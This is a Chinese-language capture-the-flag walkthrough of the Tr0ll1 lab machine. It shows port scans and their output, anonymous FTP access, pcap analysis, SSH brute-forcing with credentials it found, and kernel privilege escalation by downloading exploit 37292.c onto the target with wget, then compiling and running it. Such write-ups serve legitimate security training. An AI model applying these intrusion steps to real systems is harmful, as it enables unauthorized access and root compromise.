当前位置: 首页 > news >正文

009靶场-Tr0ll1

信息收集及漏洞突破

端口扫描,发现开了三个端口:nmap 192.168.115.0/24 -p-

Nmap scan report for 192.168.115.148
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

服务版本信息:nmap 192.168.115.148 -T4 -A -O

21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.115.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret

80端口下的网站以及目录扫描是一张图片,21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)提示我们ftp可以匿名登录,然后登录之后发现了一个流量包:

把lol.pcap放了wireshark里面进行流量分析,最后发现了这个sup3rs3cr3tdirlol,

根据提示信息,这一定是一个重要线索!

使用这个sup3rs3cr3tdirlol 进行ssh登录,ftp登录,都没成功,放了浏览器结果:

把good_luck/which_one_lol.txt的信息和/this_folder_contains_the_password/Pass.txt下的信息做为ssh 爆破的用户名和密码,最后发现用户名是overflow,密码居然是文件名Pass.txt(虽然有点狗,但是提供了一个思路)!

系统提权

使用ssh登录之后,信息收集:

首先想到的是内核提权,根据收集的信息kali里面搜索:searchsploit Ubuntu 14.04 Privilege Linux 3.13,根据收集的信息,逐步缩小搜索的范围,有利用做实验!

老方法,把.c文件下载下来,使用python下载到靶机,在靶机编译(前提条件是靶机支持下载以及gcc编译,这个简单测试即可)!

python -m http.server 80,wget http://192.168.115.130/37292.c,下载到tmp目录,否则提示权限不足;然后gcc编译,最后执行:

提权成功!!!

思路梳理

端口扫描发现21/22/80端口。扫描服务版本号,发现ftp可匿名登录。发现lol.pacp文件,里面发现一个提示的字符串,这个字符串到底是干啥的?最后测试放浏览器目录,发现一个文件,啥也没有,文件放linux执行,发现一个字符串,这个字符串又能干啥?最后又发现可以在目录访问,目录访问发现两个文件,里面有用户名和密码,最后用这里的用户名和密码爆破ssh成功。

提权使用内核提权!

http://www.jsqmd.com/news/1277900/

相关文章:

  • OpCore Simplify终极指南:5分钟创建完美黑苹果EFI配置的免费神器
  • AI与Python在双碳与生态水文中的技术融合
  • Mike与Git无缝集成:实现MkDocs文档版本自动化部署
  • 指标数据仪表盘系统有哪些?2026年五大对比 - 科技焦点
  • 解锁B站全功能体验:Bilibili Helper浏览器扩展深度解析
  • 2026年 水性环氧底漆厂家:专业防腐防锈与附着力强的供应商选择 - 卓企推荐
  • CVPR 2022突破:HiVT多智能体运动预测框架详解——从论文到代码实现
  • TPIC7710EVM评估板实战:从硬件解析到软件操作,全面掌握EPB芯片评估
  • 2026年 水性环氧底漆品牌厂家推荐:高性能防锈防腐底漆与优质环保水性涂料企业甄选 - 卓企推荐
  • 实测盘点:word怎么转pdf免费工具,这几个方法最省心 - AI测评专家
  • ALA算法优化FCM聚类的Matlab实现与工程实践
  • 管理是应对复杂性,它负责建立秩序和确定性;而领导力则是应对变革,它负责在巨大的不确定性中激发出团队打破现状的内源性动力。
  • Spring AI流式接口经过Nginx后不再逐字输出?缓冲、压缩与超时完整排查
  • C语言字符统计:从基础实现到高级应用全解析
  • 抖音小店新手入门必修课:开店前理清一件代发核心难题,提升创业成功率 - 抖掌柜
  • QMCDecode:3步解锁QQ音乐加密文件,让Mac用户真正拥有付费音乐
  • TileLang实战:用Python DSL自动生成高性能GPU计算内核
  • OPC UA工业数据采集:第一天盈利的轻量级解决方案
  • 怎么用AI写小说?从零开始,新手也能写出百万字长篇的完整步骤
  • 手机摄像头如何实现无网络文件传输?揭秘CFC项目的视觉编码黑科技
  • 2026抖音去水印是否侵权?合规在线方法及网站风险提醒 - 耶斯去水印
  • 2026年大数据分析工具排名:功能与性能解析 - 科技焦点
  • (2026最新)岳阳本地漏水检测维修公司靠谱推荐:正规防水补漏上门维修-墙面/屋顶/外墙/暗管漏水检测精准定位 - 即刻修防水
  • 基于Eclipse Milo的OPC UA服务器快速搭建与工业数据采集实践
  • MATLAB环形柱状图与核密度面积图的组合可视化方案
  • 基于Flink的实时数据血缘与作业状态监控实践
  • 学术写作全流程AI工具实战指南
  • 2026年数据指标平台推荐:管理能力与安全解析 - 科技焦点
  • OpCore Simplify:智能硬件适配引擎,自动化OpenCore EFI配置解决方案
  • 组织设计六大原则